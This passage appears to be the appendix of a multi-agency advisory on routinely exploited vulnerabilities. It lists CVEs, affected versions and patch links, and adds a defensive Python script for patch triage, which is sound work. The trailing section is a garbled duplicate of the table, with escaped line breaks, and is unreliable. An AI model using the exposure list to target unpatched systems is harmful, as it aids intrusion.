[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>)
[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)
|
Microsoft
|
Multiple Exchange Server versions; see [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>)
|
[Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>)
[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)
|
Sudo
|
Sudo before 1.9.5p2
|
[Sudo Stable Release 1.9.5p2](<https://www.sudo.ws/releases/stable/#1.9.5p2>)
|
[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)
|
Checkbox Survey
|
Checkbox Survey versions prior to 7
|
|
[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)
|
Microsoft Exchange Server
|
Multiple versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)
|
[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)
|
CISA Alert: [Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-062a>)
ACSC Advisory [Active exploitation of Vulnerable Microsoft Exchange servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers>)
CCCS Alert [Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4](<https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities>)
[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)
|
Microsoft
|
Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>)
|
[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>)
[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)
|
Microsoft
|
Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>)
|
[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>)
[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)
|
Microsoft
|
Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>)
|
[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>)
[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)
|
Jira Atlassian
|
Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)
|
ACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>)
CCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>)
[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)
|
Pulse Secure
|
PCS 9.0R3/9.1R1 and Higher
|
[Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>)
|
CCCS Alert [Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>)
[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)
|
SonicWall
|
SMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v)
|
[SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>)
|
[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)
|
Microsoft
|
Multiple Windows products; see [Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)
|
[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)
|
CCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>)
| CVE | Vendor | Affected Products | Patch Information | Resources |
|---|---|---|---|---|
| [CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>) | QNAP | QTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>); QuTS hero h4.5.1.1491 build 20201119 and later | [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>) | |
| [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Microsoft | Windows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) | [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) | ACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>); Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); CCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) |
| [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) | [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) | CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>); Joint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>); CCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix | ADC and Gateway version 13.0 all supported builds before 13.0.47.24; NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18, version 12.0 all supported builds before 12.0.63.13, version 11.1 all supported builds before 11.1.63.15, version 10.5 all supported builds before 10.5.70.12; SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b | [Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>) | Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>); CCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) |
| [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik | UI for ASP.NET AJAX through 2019.3.1023 | [Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>) | ACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Secure | Pulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 | [Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) | CISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>); CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>); ACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>); Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); CCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) |
| [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | Fortinet | FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | [Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>) | Joint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>); Joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>); Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); ACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>); CCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) |
| [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) | Cisco | See [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>) | [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>) | CCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) |
| [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft | Office, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) | [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) | CCCS Alert [Microsoft Office Security Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) |
| [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft | Multiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) | [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) | CCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) |
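The appendix states affected ranges as "branch before first fixed build", which is exactly what a patch work-list needs. As an added example, not tooling from the advisory or any vendor, the Python below checks a constructed asset inventory against the Pulse Connect Secure (CVE-2019-11510) and Citrix ADC/Gateway (CVE-2019-19781) ranges from the rows above; the hostnames, versions and the product labels used as keys are assumptions.

```python
"""Triage an asset inventory against the affected-version ranges given in the
appendix rows for CVE-2019-11510 (Pulse Connect Secure) and CVE-2019-19781
(Citrix ADC / Gateway).  Added example; not code from the advisory."""
from __future__ import annotations

import re
from dataclasses import dataclass


def parse_version(version: str) -> tuple[int, ...]:
    """Turn a vendor version string into a comparable tuple of integers.

    "8.2R12.1"   -> (8, 2, 12, 1)    (Pulse "release" notation)
    "13.0.47.24" -> (13, 0, 47, 24)  (Citrix build notation)
    Letter-suffixed builds such as the SD-WAN WANOP "10.2.6b" are NOT modelled:
    the letter is dropped, so those appliances need a separate check.
    """
    return tuple(int(n) for n in re.findall(r"\d+", version))


@dataclass(frozen=True)
class AffectedRange:
    cve: str
    product: str
    branch: tuple[int, ...]  # version prefix the range applies to, e.g. (8, 2)
    fixed: tuple[int, ...]   # first build on that branch that is NOT affected


def _r(cve: str, product: str, branch: str, fixed: str) -> AffectedRange:
    return AffectedRange(cve, product, parse_version(branch), parse_version(fixed))


# Transcribed from the appendix table: "<branch> before <fixed>" per branch.
# Product labels are our own inventory keys, not vendor identifiers.
AFFECTED_RANGES = [
    _r("CVE-2019-11510", "Pulse Connect Secure", "8.2", "8.2R12.1"),
    _r("CVE-2019-11510", "Pulse Connect Secure", "8.3", "8.3R7.1"),
    _r("CVE-2019-11510", "Pulse Connect Secure", "9.0", "9.0R3.4"),
    _r("CVE-2019-19781", "Citrix ADC/Gateway", "13.0", "13.0.47.24"),
    _r("CVE-2019-19781", "Citrix ADC/Gateway", "12.1", "12.1.55.18"),
    _r("CVE-2019-19781", "Citrix ADC/Gateway", "12.0", "12.0.63.13"),
    _r("CVE-2019-19781", "Citrix ADC/Gateway", "11.1", "11.1.63.15"),
    _r("CVE-2019-19781", "Citrix ADC/Gateway", "10.5", "10.5.70.12"),
]


def matching_ranges(product: str, version: str) -> list[AffectedRange]:
    """Return every appendix range that the given product version falls inside.

    A version is affected when it sits on a listed branch (same prefix) and
    sorts below that branch's first fixed build.  Tuple comparison handles the
    short form correctly: (8, 2, 12) < (8, 2, 12, 1), so "8.2R12" is flagged.
    A branch that is not listed yields no match; that means "not covered by
    this table", not "safe", so consult the vendor bulletin for those hosts.
    """
    v = parse_version(version)
    return [
        r for r in AFFECTED_RANGES
        if r.product == product and v[: len(r.branch)] == r.branch and v < r.fixed
    ]


def triage(inventory: list[tuple[str, str, str]]) -> dict[str, list[str]]:
    """Map each host that needs patching to the sorted CVE ids it is exposed to.

    Inventory rows are (hostname, product, version).  Hosts with no match are
    omitted, so the result is the patch work-list for this table.
    """
    worklist: dict[str, list[str]] = {}
    for host, product, version in inventory:
        cves = sorted({r.cve for r in matching_ranges(product, version)})
        if cves:
            worklist[host] = cves
    return worklist


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = [
    ("vpn-1", "Pulse Connect Secure", "8.3R7.0"),   # below 8.3R7.1     -> affected
    ("vpn-2", "Pulse Connect Secure", "9.0R3.4"),   # equals the fix    -> clean
    ("adc-1", "Citrix ADC/Gateway", "12.1.55.13"),  # below 12.1.55.18  -> affected
    ("adc-2", "Citrix ADC/Gateway", "13.0.47.24"),  # equals the fix    -> clean
    ("adc-3", "Citrix ADC/Gateway", "10.5.70.8"),   # below 10.5.70.12  -> affected
    ("adc-4", "Citrix ADC/Gateway", "13.1.4.43"),   # branch not listed -> no match
]

if __name__ == "__main__":
    for host, cves in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: patch for {', '.join(cves)}")
```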
### Contact Information
**U.S. organizations:** all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>).

**Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

**Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>).

**New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654.

**United Kingdom organizations:** report a significant cyber security incident at [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
### Revisions
April 27, 2022: Initial Version
Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\nJira Atlassian \n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>)\n\nCCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>) \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure \n\n| \n\nPCS 9.0R3/9.1R1 and Higher\n\n| \n\n[Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>)\n\n| \n\nCCCS Alert [Active 
Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>) \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall \n\n| \n\nSMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v)\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>)\n\n| \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nMicrosoft\n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP \n\n| \n\nQTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\nQuTS hero h4.5.1.1491 build 20201119 and later\n\n| \n\n[QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\n| \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nMicrosoft \n\n| \n\nWindows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, 
CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\nACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. 
Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nCCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix \n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>)\n\n| \n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nCCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik \n\n| \n\nUI for ASP.NET AJAX through 2019.3.1023\n\n| \n\n[Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>)\n\n| \n\nACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) \n 
\n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\nPulse Secure \n\n| \n\nPulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\n| \n\n[Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n| \n\nCISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS [Alert APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\nFortinet\n\n| \n\nFortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. 
